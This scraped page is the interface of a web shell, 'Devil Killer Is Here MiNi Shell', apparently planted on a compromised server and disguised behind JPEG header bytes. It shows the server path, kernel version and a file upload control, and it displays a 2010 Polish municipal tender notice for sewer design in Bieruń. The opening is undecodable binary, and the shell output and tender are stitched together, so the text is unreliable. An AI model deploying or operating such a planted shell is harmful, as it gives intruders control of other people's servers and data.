JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100430/105427-N-2010.html

<p class="kh_header"><b>Bieruń: Wybór Wykonawcy dokumentacji projektowej budowy kanalizacji sanitarnej w Ścierniach</b><br>
<b>Numer ogłoszenia: 105427 - 2010; data zamieszczenia: 30.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 032 3242439, faks (032) 2164035; 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybór Wykonawcy dokumentacji projektowej budowy kanalizacji sanitarnej w Ścierniach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia
  
Przedmiotem zamówienia jest opracowanie kompleksowej dokumentacji projektowo-kosztorysowej budowlano - wykonawczej kanalizacji sanitarnej dla dzielnicy Ściernie w Bieruniu dla terenów na południowy wschód od linii kolejowej Katowice - Oświęcim ( zgodnie z załączonym planem sytuacyjnym w skali 1:20 000) , w rejonie ulic: ul. Warszawska,  ul. Turystyczna, ul. Piaskowcowa, ul. Bazaltowa,                  ul. Marglowa, ul. Wapienna,   ul. Dolomitowa,  ul. Kamienna, ul. Skalna, ul. Pszenna, ul. Zarzyna, część ul. Bogusławskiego oraz uzyskanie pozwolenia na budowę w imieniu i na rzecz Zamawiającego. Teren podlega wpływom eksploatacji górniczej.
Szacowana długość projektowanej kanalizacji sanitarnej wynosi  14 km.
Zaleca się dokonanie wizji lokalnej w terenie przed złożeniem oferty.
1. Zakres rzeczowy opracowania dokumentacji:
1.1  aktualizacja mapy zasadniczej dla celów projektowych  w skali 1:1000 (około 100 ha), obejmująca    
       swym zasięgiem teren niezbędny do realizacji inwestycji (mapa do celów projektowych powinna 
       posiadać aktualną klauzulę właściwego ośrodka geodezyjnego z naniesionymi granicami i 
       numerami działek oraz reperami państwowymi w obrębie inwestycji oraz spełniać wymagania 
       określone w ustawie z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne (tekst jedn.                
       Dz. U. z 2005 r. Nr 240, poz. 2027 z późniejszymi zmianami), 
       Należy sprawdzić , czy rzeczywisty przebieg granic działek pokrywa się  z granicami z podkładów 
       mapowych.
1.2  wykonanie wypisów i wyrysów z rejestru ewidencji gruntów,
1.3  wykonanie badań hydrogeologicznych po trasie kanalizacji  co 300 m oraz w miejscach 
       projektowanych przepompowni i przekroczeń przeszkód terenowych(drogi, potoki),
1.4  uzyskanie decyzji o ustaleniu lokalizacji inwestycji celu publicznego,
1.5  uzgodnienie projektu na posiedzeniu ZUD,
1.6  wykonanie projektu organizacji ruchu na czas budowy wraz z niezbędnymi uzgodnieniami
1.7   wykonanie dokumentacji projektowej budowlano-wykonawczej sieci kanalizacyjnej wraz 
        z pisemnymi  zgodami właścicieli gruntów na przejście z trasą kanalizacji oraz wszystkimi 
        wymaganymi   uzgodnieniami branżowymi,
1.8   kompleksowe wykonanie projektów przepompowni ścieków (technologia, konstrukcja,  
        zasilanie energetyczne, sterowanie, automatyka ,ogrodzenie, dojazd, oświetlenie),
1.10 opracowanie specyfikacji technicznej wykonania i odbioru robót zgodnie z Rozporządzeniem 
        Ministra   Infrastruktury z 2.09.2004 r. (Dz.U. nr 202 z 16.09.2004 r.),
1.11  studium wykonalności,
1.12  projekty wykonawcze przyłączy kanalizacyjnych w 2 egzemplarzach dla każdego budynku 
         oddzielnie (krótki opis techniczny, sytuacja, profil podłużny, zestawienie materiałów),
1.13  zbiorcze zestawienie materiałów instalacyjnych do budowy przyłączy niezbędne dla
         dokonania zakupu  tych materiałów,
1.14  wykonanie projektów wykonawczych remontu dróg na trasie kanalizacji,                                 
1.15  przedmiary robót,

1.16  kosztorys inwestorski sporządzony zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 
         18.05.2004 r. w sprawie metod i podstaw sporządzania kosztorysu inwestorskiego(Dz.U. nr 130  z 
         8.06.2004 r.),
1.17  uzyskanie pozwolenia na budowę,
1.18  inwentaryzacja zieleni - zgodnie z obowiązującymi przepisami oraz w razie konieczności 
         uzyskanie zgody na wycinkę i zbliżenie sieci do drzew i krzewów,
1.19  uzyskanie wszelkich koniecznych opinii, zgód, zatwierdzeń, uzgodnień dla wykonanego projektu 
        (przygotowanie wniosków o wydanie przez dysponentów sieci warunków technicznych, uzyskanie 
         opinii niezbędnych do wydania decyzji o pozwoleniu na budowę, uzgodnienia branżowe - Zakład 
         Energetyczny, Gazowniczy, RPWiK Tychy, i inne, uzgodnienie organizacji ruchu itp.),
1.20 Uzyskanie decyzji o środowiskowych uwarunkowaniach określonej w przepisach ustawy                      
        z dnia 03.10.2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale 
        społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko                            
        (Dz. U. z  2008 r. nr 199 poz. 1227) i sporządzenie raportu oddziaływania na środowisko wraz ze 
        stosownymi postanowieniami i uzgodnieniami oraz dokumentacją techniczną zabezpieczeń 
        wynikających z raportu oddziaływania na środowisko (jeśli zajdzie konieczność). 
1.21 Operat wodno-prawny wraz z uzyskaniem pozwolenia wodno-prawnego ( jeśli zajdzie 
        konieczność).
1.22 Prace projektowe należy poprzedzić wykonaniem koncepcji sieci kanalizacyjnej, któłra będzie 
        zatwierdzona przez Zamawiającego.
Opracowana dokumentacja powinna być kompletna, co oznacza, że powinna zawierać                          wszystkie materiały geodezyjne, prawne, potwierdzone wnioski (o wydanie decyzji, dokumentów lub       wykonywania jakichkolwiek zmian) oraz decyzje administracyjne.
Przedmiary robót oraz kosztorys inwestorski powinny obejmować wszystkie niezbędne roboty związane  z budową kanalizacji, odtworzenie nawierzchni istniejących dróg, doprowadzenie terenu do stanu pierwotnego.
Projekty budowlane, przedmiary oraz specyfikacje wykonania i odbioru robót należy wykonać :                    - w wersji papierowej w 7 egzemplarzach, 
- w wersji elektronicznej (na płytce CD w w PDF) w 2 egzemplarzach.
Kosztorys inwestorski należy wykonać :
- w wersji papierowej w 2 egzemplarzach,
- w wersji elektronicznej w 2 egzemplarzach w wersji umożliwiającej jego przetwarzanie.
Studium wykonalności oraz raport oddziaływania na środowisko będą załącznikami do wniosków gminy na dofinansowanie środkami z funduszy strukturalnych UE, dlatego muszą spełniać wymogi stawiane takim dokumentom i należy je wykonać:
- w wersji papierowej w 5 egzemplarzach,
- w wersji elektronicznej w 2 egzemplarzach.
Dokumentacja musi odpowiadać wymaganiom Rozporządzenia Ministra Infrastruktury z dn. 2.09.04 r.  w sprawie szczegółowej formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U nr 202    z  16.09.2004 r.)
    Projekt budowlano-wykonawczy powinien zawierać w szczególności:
a) opis techniczny;
b) niezbędne obliczenia;
c) dokładny opis stosowanych materiałów i urządzeń;
d) opracowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia (BIOZ);
e) część rysunkową, tj.:	
           - plan sytuacyjny ,
           - przekroje charakterystyczne ,
      - profile podłużne,
      - przekroje poprzeczne ,
      - organizację ruchu na czas robót,
      - inne rysunki elementów konstrukcji obiektów, instalacji  oraz urządzeń .

2)  Przyjęte w trakcie projektowania rozwiązania, materiały należy konsultować z Zamawiającym .
3)   Projektant zobowiązany jest do opisywania proponowanych materiałów i urządzeń za pomocą 
      parametrów technicznych, tzn. bez podawania ich nazw, znaków wskazujących na producenta.
4)   Zaleca się dokonanie wizji lokalnej terenu przeznaczonego pod zabudowę przed złożeniem   
      oferty.
5)   Zamawiający nie przewiduje: udzielania zamówień uzupełniających, przeprowadzenia aukcji 
      elektronicznej , zawarcia umowy  ramowej w rozumieniu ustawy  oraz udzielania zaliczek na                
      poczet wykonania umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.24.00.00-6, 71.24.50.00-7, 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Zasady wnoszenia wadium
Wadium w wysokości  10 000 zł (słownie:  dziesięćtysięcyzłotych) musi być 
wniesione w terminie, który został podany w punkcie Terminy. 
Wadium wnoszone w pieniądzu należy wpłacić przelewem tzn. przelać z rachunku bankowego wykonawcy na rachunek bankowy zamawiającego. 
w BS O / Tychy numer konta: 26 84350004 0000 0000 6158 0001 z adnotacją: 
Wadium - nr sprawy: ZP- 3410/13/10  Przetarg nieograniczony na wybór wykonawcy 
zadania p.n. Dokumentacja projektowa budowy kanalizacji sanitarnej w Ścierniach.
 Wniesienie wadium w pieniądzu- oznacza uznanie kwoty wadium ,wpłaconego przelewem,                               na rachunku Zamawiającego.
Wadium wnoszone w innej formie niż pieniądz należy złożyć w kasie Urzędu Miejskiego 
w Bieruniu, nie później niż do godz. 12:00  w dniu otwarcia ofert. 
Wadium może być wniesione w następujących formach:
1)	w pieniądzu przelewem,
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
       z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	w gwarancjach bankowych,
4)    w gwarancjach ubezpieczeniowych, 



5)	w poręczeniach udzielanych przez podmioty, o których mowa w art.6 b ust.5 pkt 2 ustawy 
       z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109 
       poz.1158 z późniejszymi zmianami).
Jeżeli powyższe dokumenty wystawione są w języku obcym, należy przedłożyć je wraz                            z tłumaczeniem na język polski.
W przypadku wniesienia wadium przez wykonawców wspólnie ubiegających się  o udzielenie nin. zamówienia, należy wskazać  wszystkich wykonawców wspólnie ubiegających się                          o udzielenie zamówienia wraz z podaniem ich nazw i siedzib.                                                                                                                                    Wykonawca, który nie wniesie wadium, zostanie wykluczony z postępowania, zgodnie                                z art.24 ust.2 pkt 2 ustawy, a jego oferta zostanie uznana za odrzuconą.

2. Zasady zwrotu wadium
Wadium wniesione w pieniądzu zamawiający zwróci, zgodnie z art. 46 ust. 4 ustawy wraz 
z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, 
pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy 
na rachunek wykonawcy.
1) Zamawiający  zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty  
    najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego  oferta została  
    wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy.
2) Wykonawcy którego oferta została wybrana jako najkorzystniejsza zamawiający zwraca wadium 
    niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu 
    zabezpieczenia należytego wykonania umowy.
3) Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed 
    upływem terminu składania ofert.

3. Utrata wadium
Zgodnie z zastrzeżeniem ust.4a zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca  w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3, nie złożył dokumentów lub oświadczeń, 
o których mowa w art.25 ust.1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
Ponadto zgodnie z art.46 ust.5 zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania działalności lub czynności, jeżeli ustawy nakładają 
       obowiązek posiadania takich uprawnień.
Ocena spełnienia warunku nastąpi na zasadzie spełnia/nie spełnia na podstawie oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają wiedzę i doświadczenie niezbędne do realizacji tego zamówienia, tzn. wykonali 
       w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzonej 
       działalności jest krótszy - to w tym okresie co  najmniej jedną dokumentację techniczną kanalizacji 
       sanitarnej z przyłączami o długości min. 10,0 km  wraz z pozwoleniem na budowę.
Ocena spełnienia warunku nastąpi na podstawie oświadczenia wykonawcy oraz wykazu wykonanych usług   w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - to w tym okresie -  oraz dokumentów ( np. referencji) potwierdzających , że usługi te zostały wykonane należycie.
Zamawiający nie uzna za spełnienie warunku, jeżeli wykonawcy przedstawią w wykazie usługi nie odpowiadające zakresem przedmiotowi zamówienia ( tzn. wykonali projekty kanalizacji sanitarnych 
o długości mniejszej, niż 10,0 km ; przez wykonali zamawiający rozumie, że  projekty kanalizacji sanitarnej odpowiadające przedmiotowi zamówienia zostały zakończone i odebrane                              w  ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym do wykonania zamówienia.
       Ocena spełnienia warunku nastąpi na zasadzie spełnia/nie spełnia na podstawie oświadczenia 
        wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują osobami zdolnymi do wykonania zamówienia, tzn. dysponują co najmniej dwiema 
       osobami  posiadającymi  uprawnienia bez ograniczeń do projektowania sieci sanitarnych, które 
       będą uczestniczyć w wykonaniu zamówienia.
       Ocena spełnienia warunku nastąpi na zasadzie spełnia/ nie spełnia na podstawie oświadczenia 
       wykonawcy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej zrealizowanie zamówienia.
Ocena spełnienia warunku nastąpi na zasadzie spełnia/nie spełnia na podstawie oświadczenia
wykonawcy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Każdy Wykonawca przystępujący do postępowania złoży następujące oświadczenia:
1. Oświadczenie, że po zapoznaniu się z SIWZ akceptuje ją bez zastrzeżeń.
2.    Oświadczenie, że będzie związany ofertą przez 30 dni od daty upływu terminu składania ofert,         
         a w przypadku wygrania przetargu zawrze umowę wg wzoru dołączonego do specyfikacji                    
         w ciągu 14 dni od daty otrzymania zawiadomienia o wyborze oferty.
3.    Oferta jest jawna w całości / części. Strony oferty od do  stanowią tajemnicę    
         przedsiębiorstwa w rozumieniu przepisu o zwalczaniu nieuczciwej konkurencji i nie mogą być          
         ujawnione innym uczestnikom postępowania (z uwzględnieniem pkt. I. 4, podpunkty 7 i 8 SIWZ).
4.   Oświadczenie o posiadaniu lub dysponowaniu co najmniej dwiema osobami posiadającymi uprawnienia 
        do projektowania sieci sanitarnych, które będą uczestniczyć w wykonaniu zamówienia.
5.   Oświadczenie o wykonaniu zamówienia własnymi zasobami lub korzystaniu z zasobów innych 
        podmiotów.
6.   Oświadczenie, czy część zamówienia zostanie powierzona podwykonawcom.
7.   Oświadczenie o posiadaniu uprawnień do zaciągania zobowiązań i podpisania oferty w imieniu 
        wykonawcy.
8.  Zobowiązanie innych podmiotów, że będą uczestniczyć w realizacji zamówienia (w przypadku  ich uczestnictwa). 
9.  Oświadczenie podmiotów występujących wspólnie (w przypadku ich uczestnictwa).
Wszystkie oświadczenia muszą być złożone w oryginale i podpisane przez osobę (osoby) uprawnione do zaciągania zobowiązań w imieniu wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień umowy:
1)  w zakresie  terminu, jeżeli wystąpią uzasadnione okoliczności zmiany terminu rozpoczęcia lub 
     zakończenia wykonania przedmiotu umowy, w szczególności: absencja chorobowa, zmiana 
     przepisów, przedłużające się procedury związane z uzyskaniem koniecznych uzgodnień, opinii 
     i decyzji;


2)  w zakresie osób, jeżeli wystąpi konieczność dokonania zmiany osób, które będą uczestniczyć w 
     wykonywaniu przedmiotu  umowy z zachowaniem wymagań, jakie osoby te powinny spełniać, 
     określonych w SIWZ;
3) w zakresie innych zmian , które nie wykraczają poza zakres określony w art. 140 ust.1 Prawa 
     zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieruniu - Referat Zamówień Publicznych
43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2010 godzina 12:00, miejsce: Urząd Miejski w Bieruniu - kancelaria (parter)
43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com